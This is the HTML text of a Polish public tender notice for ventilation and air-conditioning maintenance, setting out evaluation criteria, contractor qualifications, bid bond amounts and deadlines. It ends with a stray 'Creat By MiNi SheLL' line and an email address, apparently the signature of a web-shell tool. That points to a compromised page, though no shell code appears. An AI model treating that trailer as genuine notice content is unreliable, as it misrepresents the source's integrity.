jako niezgodnej z treścią SWZ.<br/>	Brak zaznaczenia przez Wykonawcę w formularzu ofertowym „Czasu przystąpienia do usunięcia awarii” od chwili zgłoszenia przez Zamawiającego oznaczać będzie, że czas przystąpienia do usunięcia awarii od chwili zgłoszenia awarii przez Zamawiającego będzie wynosił powyżej 3 godz. do 3,5 godz. od chwili zgłoszenia awarii przez Zamawiającego, w związku z czym Wykonawca otrzyma 0 pkt.<br/><br/>4.	Liczba punktów uzyskanych przez dana ofertę będzie wyliczana wg. wzoru: <br/>P = K1 + K2 <br/>P - liczba punktów uzyskanych przez daną ofertę;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas przystąpienia do usunięcia awarii”.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	spełniają warunki udziału w postępowaniu dotyczące: <br/>a)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów tj., jeżeli Wykonawca:<br/>Dotyczy części zamówienia nr 1, 2, 3<br/>	posiada certyfikat dla przedsiębiorców, o którym mowa w art. 29 ustawy <br/>z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz <br/>o niektórych fluorowanych gazach cieplarnianych (t.j. Dz. U. z 2020 r. poz. 2065);<br/>c)	zdolności ekonomicznej lub finansowej<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>d)	zdolności technicznej lub zawodowej tj., jeżeli Wykonawca: <br/>Dotyczy części zamówienia nr 1, 2<br/>a.	dysponuje, co najmniej dwiema osobami posiadającymi:<br/>	ważny certyfikat dla personelu zgodnie z art. 20 ust. 1 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (t.j. Dz.U. z 2020 r. poz. 2065); <br/>	ważne świadectwo kwalifikacji Grupy 1 i 2 w zakresie eksploatacji urządzeń, instalacji lub sieci na podstawie ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (j.t. Dz.U. z 2022 r. poz. 1385 z późn. zm.) i Rozporządzeniem Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji lub sieci (t.j. Dz.U. z 2022 r. poz. 1392);<br/>Dotyczy części zamówienia nr 3<br/>a.	dysponuje, co najmniej dwiema osobami posiadającymi:<br/>	ważny certyfikat dla personelu zgodnie z art. 20 ust. 1 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (t.j. Dz.U. z 2020 r. poz. 2065); <br/>	ważne świadectwo kwalifikacji Grupy 1 i 2 w zakresie eksploatacji urządzeń, instalacji lub sieci na podstawie ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (j.t. Dz.U. z 2022 r. poz. 1385 z późn. zm.) i Rozporządzeniem Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji lub sieci (t.j. Dz.U. z 2022 r. poz. 1392); <br/>	ważne poświadczenie bezpieczeństwa osobowego lub upoważnienie do dostępu do informacji niejawnych o klauzuli „ZASTRZEŻONE” oraz dostępu do informacji niejawnych Organizacji Traktatu Północnoatlantyckiego o klauzuli „NATO RESTRICTED”, którzy odbyli przeszkolenie w zakresie ochrony informacji niejawnych i informacji niejawnych Organizacji Traktatu Północnoatlantyckiego na podstawie ustawy z 5 sierpnia 2010 r. o ochronie informacji niejawnych; <br/>b.	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał, a przypadku świadczeń okresowych lub ciągłych również wykonuje w sposób należyty:<br/>	co najmniej dwie usługi (umowy) obejmujące konserwację i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji o wartości nie mniejszej niż 100 000,00 zł brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków<br/>dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym<br/>mowa w pkt 1, dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej<br/>z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien<br/>być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2,<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony<br/>odpowiednio jak w terminie wskazanym w pkt 2.<br/>4) Do podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp oraz podwykonawców niebędących<br/>podmiotami udostępniającymi zasoby na tych zasadach, mających siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej, przepisy pkt 1), 2) i 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	Dokumentów potwierdzających posiadanie zdolności technicznej lub zawodowej, tj.: <br/>	dla części zamówienia nr 1 i 2: NIE DOTYCZY;<br/>	dla części zamówienia nr 3:<br/>wykazu osób posiadających: <br/>	ważny certyfikat dla personelu zgodnie z art. 20 ust. 1 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (t.j. Dz.U. z 2020 r. poz. 2065); <br/>	ważne świadectwo kwalifikacji Grupy 1 i 2 w zakresie eksploatacji urządzeń, instalacji lub sieci na podstawie ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (j.t. Dz.U. z 2022 r. poz. 1385 z późn. zm.) i Rozporządzeniem Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji lub sieci (t.j. Dz.U. z 2022 r. poz. 1392); <br/>	ważne poświadczenie bezpieczeństwa osobowego lub upoważnienie do dostępu do informacji niejawnych o klauzuli „ZASTRZEŻONE” oraz dostępu do informacji niejawnych Organizacji Traktatu Północnoatlantyckiego o klauzuli „NATO RESTRICTED”, którzy odbyli przeszkolenie w zakresie ochrony informacji niejawnych i informacji niejawnych Organizacji Traktatu Północnoatlantyckiego na podstawie ustawy z 5 sierpnia 2010 r. o ochronie informacji niejawnych; <br/>skierowanych przez Wykonawcę do realizacji zamówienia publicznego z podaniem imion i nazwisk tych osób, wraz z informacją dotyczącą posiadanych dokumentów oraz o podstawie do dysponowania tymi osobami w ilości minimalnej dla części zamówienia nr 3 - 2 osoby. Wzór wykazu osób stanowi załącznik nr 7 do SWZ.<br/>b) Dokumentów potwierdzających posiadanie zdolności technicznej lub zawodowej, tj.: <br/>wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie usług:<br/>	dla części zamówienia nr 1 i 2: NIE DOTYCZY;<br/>	dla części zamówienia nr 3: co najmniej dwie usługi (umowy) obejmujące konserwację i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji o wartości nie mniejszej niż 100 000,00 zł brutto każda,<br/>wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz, których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. <br/>Wzór wykazu usług stanowi załącznik nr 8 do SWZ.<br/>UWAGA: <br/>•	w przypadku, gdy Wykonawca wykonywał usługi wspólnie z innym Wykonawcą (np. w ramach konsorcjum) w zakresie wykazania spełnienia powyższego warunku udziału w postępowaniu może powołać się tylko na te usługi, które wykonywał samodzielnie. Nie może powoływać się na usługi, które faktycznie nie były przez niego wykonywane.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium dla części zamówienia nr 1, 2, 3.<br/>1.	Wniesienie wadium. <br/>1)	Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium: <br/>a)	dla części zamówienia nr 1 w wysokości: 380,00 PLN;<br/>b)	dla części zamówienia nr 2 w wysokości: 290,00 PLN;<br/>c)	dla części zamówienia nr 3 w wysokości: 1 530,00 PLN.<br/>Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, <br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>4.	Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy Zamawiającego prowadzony przez: <br/>NBP o/okr. OLSZTYN 62 1010 1397 0020 4613 9120 2000<br/>z adnotacją <br/>„Wadium do postępowania nr 65/SZP/2023” <br/><br/>5.	Za wadium wniesione w terminie uważa się:<br/>a) dla wadium wnoszonego w dopuszczalnych formach niepieniężnych, o których mowa w ust. 2 pkt 2-4, Wykonawca przekazuje oryginał gwarancji lub poręczenia, w postaci elektronicznej - przed upływem terminu składania ofert.<br/>b) dla wadium wnoszonego w pieniądzu - datę uznania rachunku bankowego przez bank Zamawiającego przed upływem terminu składania ofert.<br/>6.	Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować Zamawiającemu wypłatę pełnej kwoty wadium, w przypadku zaistnienia okoliczności wskazanych w art. 98 ust. 6 ustawy Pzp, nieodwołalnie i bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego przedstawione gwarantowi w formie pisemnej w terminie związania ofertą.<br/>Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających Zamawiającemu wypłacenie wadium.<br/>7.	Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia, zaleca <br/>się, aby dokument potwierdzający wniesienie wadium wskazywał numer części, której dotyczy. W przypadku braku wskazania numeru części, której wadium dotyczy (przy jednoczesnym wniesieniu niższej od wymaganej łącznej wysokości wadium) oraz niemożności jednoznacznego przypisania wysokości wadium do poszczególnych części, oferta Wykonawcy odrzucona będzie we wszystkich częściach na podstawie <br/>art. 226 ust. 1 pkt 14 b ustawy Pzp.<br/>8.	Zwrot wadium i zatrzymanie wadium będą się odbywać zgodnie z art. 98 ustawy Pzp. <br/>9.	Zamawiający dopuszcza wniesienie wadium tylko przez lidera lub jednego <br/>z uczestników Konsorcjum, w imieniu wszystkich uczestników Konsorcjum.<br/>10.	W przypadku wadium wnoszonego w formie innej niż pieniądz przez jednego <br/>z uczestników Konsorcjum w treści dokumentu wadialnego musi być wyszczególniony pełen skład Konsorcjum. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, potwierdzającego brak podstaw wykluczenia na<br/>podstawie art. 108 ust 1 oraz art. 109 ust. 1 pkt 4), 5) i 7) ustawy Pzp oraz spełniania warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu.<br/>2.Zgodnie z art. 117 ust. 4 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy - wzór - załącznik nr 5 do SWZ.<br/>3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty<br/>należy dołączyć pełnomocnictwo podpisane elektronicznym podpisem, kwalifikowanym,<br/>podpisem zaufanym lub podpisem osobistym przez uprawnionych przedstawicieli pozostałych<br/>Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta<br/>zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych<br/>Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez<br/>Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia znajduje się w §15 umów stanowiących załączniki nr 4a i 4b do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie przesłanek<br/>opisanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com